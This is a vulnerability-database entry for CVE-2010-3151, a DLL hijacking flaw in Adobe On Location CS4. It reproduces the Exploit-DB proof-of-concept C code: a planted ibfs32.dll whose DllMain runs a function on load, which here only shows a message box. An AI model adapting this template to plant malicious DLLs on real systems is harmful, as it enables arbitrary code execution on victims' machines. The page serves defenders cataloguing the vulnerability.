CVE-2010-3151
Description
Untrusted search path vulnerability in Adobe On Location CS4 Build 315 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse ibfs32.dll that is located in the same folder as an OLPROJ file.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking
/*
Exploit Title: Adobe On Location CS4 DLL Hijacking Exploit (ibfs32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: CS4 Build 315
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .olproj
Greetz: Astalavista, OffSEC, Exploit-DB
*/
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_hijack();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_hijack()
{
MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
}
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| adobe | onlocation_cs4 | 4.0.1 | |
| adobe | onlocation_cs4 | 4.0.2 | |
| adobe | onlocation_cs4 | 4.0.3 | |
| adobe | premiere_pro_cs4 | 4.0.1 | |
| adobe | premiere_pro_cs4 | 4.1.0 | |
| adobe | premiere_pro_cs4 | 4.2.0 | |
| adobe | premiere_pro_cs4 | 4.2.1 | |
References
- http://www.exploit-db.com/exploits/14772/
- http://www.securityfocus.com/archive/1/513332/100/0/threaded
- https://exchange.xforce.ibmcloud.com/vulnerabilities/64445
- http://www.exploit-db.com/exploits/14772/
- http://www.securityfocus.com/archive/1/513332/100/0/threaded
- https://exchange.xforce.ibmcloud.com/vulnerabilities/64445
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.